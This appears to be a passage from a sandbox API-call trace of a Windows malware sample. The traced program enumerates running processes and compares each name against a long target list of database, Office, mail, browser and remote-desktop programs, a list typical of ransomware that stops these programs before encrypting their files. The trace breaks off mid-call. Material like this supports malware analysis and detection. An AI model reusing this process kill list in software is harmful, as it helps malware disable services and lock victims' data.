[0112.852] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0112.853] lstrcmpiW (lpString1="centralcreditcard.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.853] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0112.854] lstrcmpiW (lpString1="creditservice.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.854] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0112.856] lstrcmpiW (lpString1="edcsvr.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.856] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0112.857] lstrcmpiW (lpString1="fpos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.857] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0112.858] lstrcmpiW (lpString1="isspos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.858] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0112.859] lstrcmpiW (lpString1="mxslipstream.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.859] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0112.868] lstrcmpiW (lpString1="omnipos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.868] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0112.871] lstrcmpiW (lpString1="spcwin.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.871] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0112.872] lstrcmpiW (lpString1="spgagentservice.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.872] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0112.873] lstrcmpiW (lpString1="utg2.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.873] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="requested.exe")) returned 1 [0112.874] lstrcmpiW (lpString1="requested.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.874] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="believe.exe")) returned 1 [0112.875] lstrcmpiW (lpString1="believe.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.875] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="jacksonville.exe")) returned 1 [0112.876] lstrcmpiW (lpString1="jacksonville.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.877] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0112.877] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.878] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0112.879] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.879] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.880] lstrcmpiW 